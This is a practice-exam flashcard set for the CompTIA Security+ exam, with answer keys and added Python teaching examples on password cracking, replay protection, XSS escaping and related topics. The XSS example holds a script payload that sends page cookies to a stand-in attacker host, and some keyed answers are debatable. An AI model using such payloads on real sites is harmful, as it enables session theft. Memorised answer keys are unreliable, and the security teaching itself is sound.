Practice Exam 2 Flashcards
CompTIA Security+ Review Guide: Exam SY0-501.
The most common form of authentication factor is a __________.
A. Password
B. Fingerprint
C. Smartcard
D. Token
A. Password
A password is the most common form of authentication. Fingerprints, smartcards, and tokens are widely used, but they aren’t the most widely used forms of authentication.
You’ve just received an email message that describes a new malicious code threat that’s ravaging the Internet. The message contains detailed information about the threat, describes the damage it can inflict, and provides instructions on how to remove it from your system. The message states that you can easily detect whether you’ve already been a victim of this threat by checking for the presence of three files in the \Windows\System32 folder. As a countermeasure, the message instructs you to delete these three files from your system to prevent further spread of the threat. What should your first action be, based on this message?
A. Locate and delete the identified files.
B. Perform a system backup.
C. Inform your network administrator.
D. Send the message to others in the office.
C. Inform your network administrator.
The best first response to a hoax message such as this is to inform your network administrator. Performing a system backup isn’t a bad idea, just not the best choice for your first response. Don’t follow the instructions or send the message to others.
Which of the following is not true of a NoSQL DBMS?
A. NoSQL uses a nonrelational database structure, such as hierarchical or multilevel nesting/referencing.
B. NoSQL cannot support Structured Query Language expressions.
C. NoSQL is well suited for managing extremely large collections of data.
D. NoSQL solutions typically do not support ACID.
B. NoSQL cannot support Structured Query Language expressions.
Some NoSQL DBMSs do support SQL or SQL-like query expressions, so statement B is the false one; the other three statements are generally true of NoSQL systems.
Which of the following represents the most secure system from a best practices perspective?
A. Removing all unneeded services and protocols
B. Using a new operating system right out of the box
C. Installing every available optional component
D. Using a firewall to provide boundary protection
A. Removing all unneeded services and protocols
The best solution is to remove all unneeded services and protocols. Using an operating system right out of the box and installing all components is never considered a secure option. Adding a firewall to a locked-down system is a security improvement but not a valid replacement for first removing things that aren’t needed on the server.
The technology used to prevent EMI from entering or leaving a specific room is known as __________.
A. Padded cell
B. TEMPEST
C. Site surveys
D. Directory service
B. TEMPEST
TEMPEST is the technology (and the set of standards) used to prevent EMI (electromagnetic interference) and electromagnetic emanations from entering or leaving a specific room, typically through shielding such as a Faraday cage. A padded cell is used to delay an intruder with a fake environment while that person’s activities are logged. Site surveys are used to detect where the signal from a wireless access point can be detected. A directory service is a searchable index of network resources.
Why is Internet email so vulnerable to attack?
A. It uses IP addresses to route messages.
B. Anyone can use email.
C. It requires adherence to standards.
D. It’s often sent using SMTP in clear form.
D. It’s often sent using SMTP in clear form.
Email is vulnerable to attack because it often uses SMTP (Simple Mail Transfer Protocol) and sends messages in clear form. Email’s use of IP addresses via the domain names found in email addresses, the fact that anyone can use email, and the fact that it requires adherence to standards doesn’t make email any more vulnerable than any other form of TCP/IP application.
The form of password attack that attempts to process every possible combination to discover passwords stored in an accounts database is known as what?
A. Dictionary attack
B. Brute-force attack
C. Birthday attack
D. Mathematical attack
B. Brute-force attack
A brute-force password attack attempts to process every possible combination to discover passwords stored in an accounts database. A dictionary attack is similar but uses a predefined set or list of passwords rather than every possible combination. A birthday attack (reverse hash matching) looks for hash collisions rather than the original password; it doesn’t imply that all possible password combinations are tried. A mathematical attack attempts to exploit the algorithm of a cryptography solution; it’s usually not associated with password attacks.
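The difference between the two attacks is the size of the search space. The following is an added example (not from the review guide) that runs both attacks against a constructed accounts database of unsalted SHA-256 hashes; the usernames, passwords, and word list are made up for the demonstration.

```python
import hashlib
import itertools
import string


def sha256_hex(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed accounts database: username -> unsalted SHA-256 of the password.
# (Unsalted, fast hashes are exactly what makes these offline attacks cheap.)
ACCOUNTS = {
    "alice": sha256_hex("letmein"),  # a common word: dictionary attack territory
    "bob": sha256_hex("zq7"),        # short and random: only brute force will find it
}

# Constructed word list, in the order an attacker would try the entries.
WORDLIST = ["password", "123456", "letmein", "qwerty"]

ALPHABET = string.ascii_lowercase + string.digits  # 36 symbols


def dictionary_attack(target_hash: str, wordlist):
    """Try only the predefined candidates. Returns (password or None, guesses made)."""
    for guesses, candidate in enumerate(wordlist, start=1):
        if sha256_hex(candidate) == target_hash:
            return candidate, guesses
    return None, len(wordlist)


def brute_force(target_hash: str, alphabet: str, max_len: int):
    """Try every combination of the alphabet up to max_len. Returns (password or None, guesses made)."""
    guesses = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            guesses += 1
            candidate = "".join(combo)
            if sha256_hex(candidate) == target_hash:
                return candidate, guesses
    return None, guesses


def keyspace(alphabet: str, max_len: int) -> int:
    """Number of candidates a brute-force run up to max_len must be prepared to try."""
    return sum(len(alphabet) ** n for n in range(1, max_len + 1))


if __name__ == "__main__":
    print("alice via dictionary:", dictionary_attack(ACCOUNTS["alice"], WORDLIST))
    print("bob via dictionary:  ", dictionary_attack(ACCOUNTS["bob"], WORDLIST))
    print("bob via brute force: ", brute_force(ACCOUNTS["bob"], ALPHABET, 3))
    print("7-char keyspace:     ", keyspace(ALPHABET, 7))
```

The dictionary attack finds alice’s password in three guesses and never finds bob’s; brute force finds bob’s three-character password after tens of thousands of guesses and would need roughly 80 billion for a seven-character one from the same alphabet, which is why salted, slow password hashes (and length, not just complexity) matter.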
What is the most crucial part of enabling an investigator to reconstruct the correct order of criminal events from all the records and data collected from a crime scene during a forensic investigation?
A. Take hashes of collected data
B. Make notes of each task performed
C. Record time offset
D. Send out legal hold letters
C. Record time offset
As an event is recorded into a log file, it is encoded with a time stamp. The time stamp is pulled from the clock on the local device where the log file is written or sent with the event from the originating device if remote logging is performed. However, it is all too common for the clocks of the devices and computers in a network to be out of time sync to some degree. Recording the time offset is taking note of the difference between the device clock and the standard; it is used to adjust the time of log entries in order to sync events and activities across multiple network devices. Management of log times is essential for the chronological reconstruction of attack or compromise events.
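The correction itself is simple arithmetic, but it changes the story the logs tell. The following is an added example (not from the review guide) using three constructed log entries and constructed, already-measured clock offsets; the device names, timestamps, and messages are made up, and the devices are assumed to log in UTC.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample events: (device, timestamp as written by that device's own clock, message).
RAW_EVENTS = [
    ("firewall",    "2024-03-01T10:00:05", "allow tcp 10.0.0.5 -> 203.0.113.9:443"),
    ("webserver",   "2024-03-01T09:58:12", "GET /admin 200 from 10.0.0.5"),
    ("workstation", "2024-03-01T10:07:40", "powershell.exe spawned by winword.exe"),
]

# Time offsets recorded at collection time: device clock minus the reference (NTP) clock.
# Positive means the device clock runs ahead of the reference; negative means it lags.
TIME_OFFSETS = {
    "firewall":    timedelta(0),
    "webserver":   timedelta(minutes=-2, seconds=-10),  # 2m10s slow
    "workstation": timedelta(minutes=7, seconds=25),    # 7m25s fast
}


def parse_local(stamp: str) -> datetime:
    """Parse an ISO-8601 stamp with no zone; assume the devices log in UTC (an assumption)."""
    return datetime.fromisoformat(stamp).replace(tzinfo=timezone.utc)


def naive_order(raw_events):
    """Order by the raw stamps, as an investigator would without offset data."""
    return [dev for _, dev, _ in sorted((parse_local(s), d, m) for d, s, m in raw_events)]


def normalize(raw_events, offsets):
    """Subtract each device's offset so every stamp is expressed in reference time."""
    corrected = []
    for device, stamp, msg in raw_events:
        if device not in offsets:
            # Without a recorded offset the event cannot be placed reliably; fail loudly.
            raise KeyError(f"no recorded time offset for {device}")
        corrected.append((parse_local(stamp) - offsets[device], device, msg))
    return sorted(corrected)


def corrected_order(raw_events, offsets):
    return [dev for _, dev, _ in normalize(raw_events, offsets)]


if __name__ == "__main__":
    print("raw order:      ", naive_order(RAW_EVENTS))
    for ts, dev, msg in normalize(RAW_EVENTS, TIME_OFFSETS):
        print(ts.isoformat(), dev, msg)
```

Read naively, the web server request appears to precede the firewall allow rule; once the offsets are applied, the firewall entry comes first, the workstation’s suspicious process start is in the middle, and the web request is last. The example also refuses to place an event from a device whose offset was never recorded, which is the practical reason offsets are captured at collection time rather than guessed later.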
What form of network segmentation should be used to prevent all cross-communication between devices?
A. Airgap
B. VLAN
C. Subnets
D. Virtualization
A. Airgap
Physical segmentation is when no links are established between networks. This is also known as an airgap. If there are no cables and no wireless connections between two networks, then a physical network segregation, segmentation, or isolation has been achieved. This is the most reliable means of prohibiting unwanted transfer of data.
What form of recovery site requires the least amount of downtime before mission-critical business operations can resume?
A. Cold
B. Warm
C. Hot
D. Offsite
C. Hot
A hot site requires the least amount of downtime before mission-critical business operations can resume, because it is a real-time mirror of the primary site.
In a MAC environment, when a user has clearance for assets but is still unable to access those assets, what other security feature is in force?
A. Principle of least privilege
B. Need to know
C. Privacy
D. Service-level agreement
B. Need to know
Need to know is the MAC environment’s granular access control method. The principle of least privilege is the DAC environment’s concept of granular access control. Privacy and SLAs aren’t forms of access control.
Sensitivity labels are used by which form of access control?
A. DAC
B. MAC
C. RBAC
D. TBAC
B. MAC
MAC (mandatory access control) uses sensitivity labels. DAC (discretionary access control) uses identity. RBAC (role-based access control) uses job descriptions. TBAC (task-based access control) uses work tasks.
The purpose of a replay attack is ___________.
A. Intercepting encrypted data
B. Preventing a server from responding to legitimate resource requests
C. Discovering passwords
D. Gaining access to resources based on a user’s credentials
D. Gaining access to resources based on a user’s credentials
The purpose of a replay attack is to gain access to resources based on a user’s credentials. A replay attack isn’t used to intercept encrypted data, prevent a server from responding to legitimate resource requests, or discover passwords.
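A replay attack works even when the captured request is cryptographically authenticated, because nothing ties the message to a single use. The following is an added example (not from the review guide) contrasting a server that checks only the MAC with one that also requires a fresh nonce inside a time window; the shared key, the request format, and the window size are assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets
import time

# Constructed shared secret (hypothetical); in practice this is a session key or token secret.
KEY = b"constructed-shared-secret"


def sign(msg: bytes) -> bytes:
    return hmac.new(KEY, msg, hashlib.sha256).digest()


def mac_ok(msg: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(sign(msg), tag)


class NaiveServer:
    """Checks only that the MAC is valid: a captured request replays successfully."""

    def verify(self, msg: bytes, tag: bytes, now=None) -> bool:
        return mac_ok(msg, tag)


class NonceServer:
    """Binds each request to a fresh nonce and a timestamp; replays and stale requests are rejected."""

    def __init__(self, window_seconds: int = 300):
        self.window = window_seconds
        self.seen = {}  # nonce -> timestamp, so old entries can be expired

    def verify(self, msg: bytes, tag: bytes, now=None) -> bool:
        if not mac_ok(msg, tag):
            return False  # forged or tampered
        nonce, ts, _action = msg.split(b"|", 2)
        now = time.time() if now is None else now
        if abs(now - float(ts)) > self.window:
            return False  # outside the acceptance window
        # Expire nonces older than the window so the seen set stays bounded.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if nonce in self.seen:
            return False  # replay of a request already honoured
        self.seen[nonce] = float(ts)
        return True


def make_request(action: bytes, now=None):
    """Client side: nonce|timestamp|action, authenticated with the shared key."""
    now = time.time() if now is None else now
    msg = b"|".join([secrets.token_hex(8).encode(), str(now).encode(), action])
    return msg, sign(msg)


def simulate(server, now: float = 1_700_000_000.0):
    """Send a legitimate request, then replay the exact captured bytes one second later."""
    msg, tag = make_request(b"transfer 100 to mallory", now=now)
    first = server.verify(msg, tag, now=now)
    replay = server.verify(msg, tag, now=now + 1)
    return first, replay


if __name__ == "__main__":
    print("naive server (first, replay):", simulate(NaiveServer()))
    print("nonce server (first, replay):", simulate(NonceServer()))
```

The naive server accepts the replay because the MAC is still valid; the nonce server accepts the original and rejects the replay, a stale request, and a tampered one. The time window is what keeps the set of seen nonces from growing forever.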
Which of the following is not an example of symmetric cryptography?
A. AES
B. Blowfish
C. CAST-128
D. RSA
D. RSA
RSA is asymmetric. AES, Blowfish, and CAST-128 are symmetric.
Which of the following is not typically a legal agreement or commitment, but rather a more formal form of a reciprocal agreement or gentlemen’s handshake (neither of which is typically written down), and can be called a “letter of intent”?
A. MOU
B. ISA
C. SLA
D. BPA
A. MOU
An MOU (memorandum of understanding) is an expression of agreement or aligned intent, will, or purpose between two entities. An MOU is not typically a legal agreement or commitment, but rather a more formal form of a reciprocal agreement or gentlemen’s handshake (neither of which is typically written down). An MOU can also be called a “letter of intent.”
Which of the following is not considered a secure coding technique?
A. Using immutable systems
B. Using stored procedures
C. Code signing
D. Server-side validation
A. Using immutable systems
Using immutable systems is a deployment and infrastructure hardening practice (systems are replaced rather than modified in place), not a coding technique. Stored procedures, code signing, and server-side input validation are secure coding techniques. Programmers need to adopt secure coding practices, security experts need to train programmers, and security auditors need to monitor code throughout development for proper security elements.
Certificates have what single purpose?
A. Proving identity
B. Proving quality
C. Providing encryption security
D. Exchanging encryption keys
A. Proving identity
Certificates have the single purpose of proving identity. They don’t prove quality or provide encryption security, and they aren’t used to exchange encryption keys.
When a vendor releases a patch, which of the following is the most important?
A. Installing the patch immediately
B. Setting up automatic patch installation
C. Allowing users to apply patches
D. Testing the patch before implementation
D. Testing the patch before implementation
It is most important to test patches before installing them onto production systems. Otherwise, business tasks can be interrupted if the patch does not perform as expected. Never rush to install a patch if that means skipping testing. Do not automatically roll out patches; be sure to test them first. Do not give users the power to install patches; this should be managed by administrators.
In order to prevent any one administrator from taking full control over a cryptography system or performing fraud, which of the following solutions should not be implemented?
A. M of N control
B. Job rotation
C. Multiple key pairs
D. Separation of duties
B. Job rotation
Job rotation isn’t appropriate in this situation since it trains a single person to perform all administrative tasks and therefore provides each person with the ability to overrun the entire system. M of N controls, multiple key pairs, and separation of duties should be used to prevent a single person from compromising the entire system.
Why should generic, anonymous, or group accounts be prohibited?
A. No support for multifactor authentication
B. Not supported by LDAP
C. Inability to hold individuals accountable
D. Requires the use of a TPM
C. Inability to hold individuals accountable
Generic account prohibition is the rule that no generic or shared or anonymous accounts should be allowed in private networks or on any system where security is important. Only with unique accounts per subject is it possible to track the activities of individuals and be able to hold them accountable for their actions and any violations of company policy or the law.
Which of the following is a form of web security that encrypts web sessions for modern web servers and browsers?
A. SSH
B. S-HTTP
C. TLS
D. IPSec
C. TLS
TLS (Transport Layer Security) is the primary form of security used on modern web servers and browsers to encrypt web sessions. SSH (Secure Shell) and IPSec (Internet Protocol Security) are not directly related to web sessions. S-HTTP (Secure HTTP) is a legacy security protocol that is no longer supported by most web servers and browsers.
Which form of penetration testing is able to determine the risk level resulting from a standard employee who becomes dissatisfied with their job?
A. Gray box
B. Vulnerability analysis
C. Black box
D. White box
A. Gray box
Gray-box testing combines the two other approaches to perform an evaluation based on partial knowledge of the target environment. The results are a security evaluation from the perspective of a disgruntled employee. An employee has some knowledge of the organization and its security and has some level of physical and logical access.
When a cryptography solution uses keys that are easily guessed due to their short length, this allows for a form of attack known as ___________.
A. Eavesdropping attack
B. Birthday attack
C. Social engineering attack
D. Spoofing attack
B. Birthday attack
When a cryptography solution uses keys that are short, this allows for a form of attack known as a birthday attack. Eavesdropping, social engineering, and spoofing aren’t directly associated with cryptography attacks.
What is a cipher suite?
A. A standardized collection of authentication, encryption, and hashing algorithms used to set or define the parameters for a secure network communication
B. A communication tunnel between two entities across an intermediary network
C. A storage process by which copies of private keys and/or secret keys are retained by a centralized management system
D. A process by which one communication is hidden inside another communication
A. A standardized collection of authentication, encryption, and hashing algorithms used to set or define the parameters for a secure network communication
A cipher suite is a standardized collection of authentication, encryption, and hashing algorithms used to set or define the parameters for a secure network communication. A VPN is a communication tunnel between two entities across an intermediary network. Key escrow is a storage process by which copies of private keys and/or secret keys are retained by a centralized management system. Steganography is a process by which one communication is hidden inside another communication.
What is the programmatic activity of retrieving the value stored in a memory location by triggering the pulling of the memory based on its address or location as stored in a pointer?
A. DLL injection
B. Pointer dereferencing
C. Integer overflow
D. Pivot
B. Pointer dereferencing
Pointer dereferencing is the programmatic activity of retrieving the value stored in a memory location by triggering the pulling of the memory based on its address or location as stored in a pointer.
Which of the following is a form of malicious code injection attack where attackers are able to compromise a web server and inject their own malicious code into the content sent to other visitors?
A. Cross-site scripting
B. Form field manipulation
C. Birthday attack
D. Spoofing attack
A. Cross-site scripting
Cross-site scripting is a form of malicious code injection attack where attackers are able to compromise a web server and inject their own malicious code into the content sent to other visitors. Form field manipulation occurs when an attack changes elements in a web document on the client side before submitting results back to the web server. A birthday attack is associated with hashing. Spoofing is falsifying source information.
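The injection succeeds whenever untrusted input is placed into a page without encoding for the context it lands in. The following is an added example (not from the review guide) showing a vulnerable render function beside a hardened one, and a second context, a link attribute, where escaping alone is not enough; the comment payload and URLs are constructed for the demonstration.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker input, as it might be submitted through a comment form.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def render_comment_vulnerable(comment: str) -> str:
    """Interpolates raw user input into HTML: whatever the attacker wrote runs in every visitor's browser."""
    return f'<p class="comment">{comment}</p>'


def render_comment_hardened(comment: str) -> str:
    """Output-encodes for the HTML text context, so the input is displayed rather than interpreted."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def safe_href(url: str) -> str:
    """Escaping alone does not help in a URL attribute: a javascript: URL contains no < or >.
    Allow only http/https, then encode for the attribute context."""
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_link(text: str, url: str) -> str:
    return f'<a href="{safe_href(url)}">{html.escape(text, quote=True)}</a>'


def contains_active_script(page: str) -> bool:
    """Crude detector for the demonstration: is there still a live <script> tag in the page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_hardened(PAYLOAD))
    print(render_link("profile", "javascript:alert(document.cookie)"))
```

The hardened comment renderer turns the payload into visible text, and the link renderer refuses a javascript: scheme entirely, since html.escape would have passed it through unchanged. Real applications should let a templating engine with automatic contextual escaping do this rather than hand-rolling it.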
What form of federation trust should be established between domain entities A and B as well as B and C in order for members of each domain to be able to access the resources of all three of the linked domains?
A. One-way nontransitive trusts
B. One-way transitive trusts
C. Two-way nontransitive trusts
D. Two-way transitive trusts
D. Two-way transitive trusts
Two-way transitive trusts between domains A and B as well as B and C will link all three domains in such a way that members of any domain can access resources in any other domain.
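Which users end up able to reach which domains depends on both direction and transitivity. The following is an added example (not from the review guide) that models the three-domain chain as a small graph and computes the reachable domains for each trust type; the modeling convention assumed here is the Active Directory one, where “A trusts B” means accounts from B can access resources in A.

```python
from collections import deque


def build_trusts(pairs, two_way: bool, transitive: bool):
    """pairs like [("A", "B"), ("B", "C")]: each means 'first domain trusts second' (one-way),
    or both directions when two_way. Returns a list of (trusting, trusted, transitive)."""
    trusts = []
    for trusting, trusted in pairs:
        trusts.append((trusting, trusted, transitive))
        if two_way:
            trusts.append((trusted, trusting, transitive))
    return trusts


def accessible_from(trusts, home: str):
    """Domains whose resources a user whose account lives in `home` can reach.
    A direct trust always counts; a chain counts only when every link in it is transitive."""
    reach = set()
    # State: (domain reached, whether the link used to get there allows extending the chain).
    queue = deque([(home, True)])
    visited = {(home, True)}
    while queue:
        current, may_extend = queue.popleft()
        for trusting, trusted, is_transitive in trusts:
            if trusted != current or trusting == home:
                continue
            if current != home and not (may_extend and is_transitive):
                continue  # a nontransitive link ends the chain
            reach.add(trusting)
            state = (trusting, is_transitive)
            if state not in visited:
                visited.add(state)
                queue.append(state)
    return sorted(reach)


def everyone_reaches_everyone(trusts, domains) -> bool:
    """True when a member of any domain can access resources in every other domain."""
    return all(accessible_from(trusts, d) == sorted(set(domains) - {d}) for d in domains)


PAIRS = [("A", "B"), ("B", "C")]  # the chain from the question
DOMAINS = ["A", "B", "C"]

if __name__ == "__main__":
    for two_way in (False, True):
        for transitive in (False, True):
            t = build_trusts(PAIRS, two_way, transitive)
            kind = ("two-way" if two_way else "one-way") + (" transitive" if transitive else " nontransitive")
            print(kind, {d: accessible_from(t, d) for d in DOMAINS}, everyone_reaches_everyone(t, DOMAINS))
```

Only the two-way transitive configuration gives every domain access to the other two; with one-way nontransitive trusts, users in A reach nothing and users in C reach only B.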
TACACS, a solution similar to RADIUS, is based on what RFC?
A. RFC 1918
B. RFC 2828
C. RFC 1492
D. RFC 1087
C. RFC 1492
TACACS (Terminal Access Controller Access Control System) is based on RFC 1492. RFC 1918 defines private IP (Internet Protocol) addresses. RFC 2828 is the Internet security glossary. RFC 1087 is the “ethics and the Internet” document.
Certificates operate under the security concept of __________.
A. Principle of least privilege
B. Trusted third party
C. Separation of duties
D. Need to know
B. Trusted third party
Certificates operate under the security concept of trusted third party. Certificates aren’t associated with the principle of least privilege, separation of duties, or need to know.
Data is not always stored statically on a storage device. Thus, a range of security mechanisms are needed to provide reasonable protection over a range of events and circumstances. Which of the following is a false statement?
A. Data in-transit is data being communicated over a network connection.
B. Session encryption should be used to protect data in-transit.
C. Storage encryption, such as file encryption or whole-drive encryption, should be used to protect data at-rest.
D. Data in-use should be protected against disclosure with hashing.
D. Data in-use should be protected against disclosure with hashing.
Hashing is an integrity protecting mechanism, not a protection against disclosure. Data in-use is data being actively processed by an application. Open and active data is only secure if the logical and physical environment is secure. A well-established security baseline and physical access control are needed to provide reasonable protection for data in-use.
Which of the following is not an essential element in locking down a server?
A. Remove unneeded components.
B. Install updates and patches.
C. Perform user awareness training.
D. Configure the system according to company standards and baselines.
C. Perform user awareness training.
User awareness training is an essential part of security, but it isn’t directly related to locking down a server. Server lockdown should include removing unneeded components, installing updates and patches, and complying with company standards and baselines.
What type of security zone can be positioned so it operates as a buffer network between the secured private network and the Internet and can host publicly accessible services?
A. Honeypot
B. DMZ
C. Extranet
D. Intranet
B. DMZ
A DMZ (demilitarized zone) is a type of security zone that can be positioned so it operates as a buffer network between the secured private network and the Internet and can host publicly accessible services. A honeypot is a false network used to trap intruders; it isn’t used to host public services. An extranet is for limited partner access, not public. An intranet is the private secured network.
What certificate format is also a file extension and stores Base64 ASCII-encoded certificate information for server certificates, intermediate certificates, and private keys?
A. DER
B. PFX
C. P7B
D. PEM
D. PEM
PEM (Privacy-Enhanced Mail) is a certificate format that uses Base64 (ASCII) to encode the DER certificate details into a file with a .pem, .crt, .cer, or .key extension. PEM certificate files include “-----BEGIN CERTIFICATE-----” and “-----END CERTIFICATE-----” statements. PEM can be used to store server certificates, intermediate certificates, and private keys.
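Because PEM is just Base64 between labelled marker lines, a few lines of code can walk a bundle, recover the DER bytes, and flag a private key that should not be there. The following is an added example (not from the review guide); the DER payloads are constructed minimal ASN.1 SEQUENCEs standing in for real certificates and keys, and the regex, labels, and helper names are the example’s own.

```python
import base64
import re
import textwrap

# One pattern for any PEM block; the backreference requires the END label to match the BEGIN label.
PEM_BLOCK = re.compile(r"-----BEGIN ([A-Z0-9 ]+)-----\s*(.*?)\s*-----END \1-----", re.DOTALL)


def to_pem(label: str, der: bytes) -> str:
    """Encode DER bytes as a PEM block, 64 Base64 characters per line (RFC 7468 layout)."""
    body = "\n".join(textwrap.wrap(base64.b64encode(der).decode("ascii"), 64))
    return f"-----BEGIN {label}-----\n{body}\n-----END {label}-----\n"


def parse_pem(text: str):
    """Return [(label, der_bytes), ...] for every well-formed block in a PEM file or bundle."""
    blocks = []
    for m in PEM_BLOCK.finditer(text):
        label, body = m.group(1), m.group(2)
        der = base64.b64decode("".join(body.split()), validate=True)
        blocks.append((label, der))
    return blocks


def looks_like_der(data: bytes) -> bool:
    """X.509 certificates and PKCS#8 keys both start with an ASN.1 SEQUENCE (tag 0x30)."""
    return len(data) >= 2 and data[0] == 0x30


def private_key_labels(text: str):
    """Labels of any private-key blocks: a bundle meant for distribution must not contain one."""
    return [label for label, _ in parse_pem(text) if "PRIVATE KEY" in label]


# Constructed stand-ins for real DER: a minimal SEQUENCE containing a single INTEGER.
FAKE_CERT_DER = b"\x30\x03\x02\x01\x05"
FAKE_KEY_DER = b"\x30\x03\x02\x01\x07"
BUNDLE = to_pem("CERTIFICATE", FAKE_CERT_DER) + to_pem("PRIVATE KEY", FAKE_KEY_DER)

if __name__ == "__main__":
    print(BUNDLE)
    for label, der in parse_pem(BUNDLE):
        print(label, der.hex(), "DER?" , looks_like_der(der))
    print("private keys present:", private_key_labels(BUNDLE))
```

The same parser handles a chain file with several CERTIFICATE blocks, and a block whose END label does not match its BEGIN label is silently skipped rather than half-decoded.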
What is integrated into WPA2 as a replacement for TKIP and is based on AES?
A. CCMP
B. IEEE 802.1x
C. LEAP
D. ECDHE
A. CCMP
Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) was created to replace TKIP (used by WPA) and the RC4-based encryption of WEP. CCMP is based on AES. It’s the preferred standard security protocol for 802.11 wireless networking, as specified by 802.11i.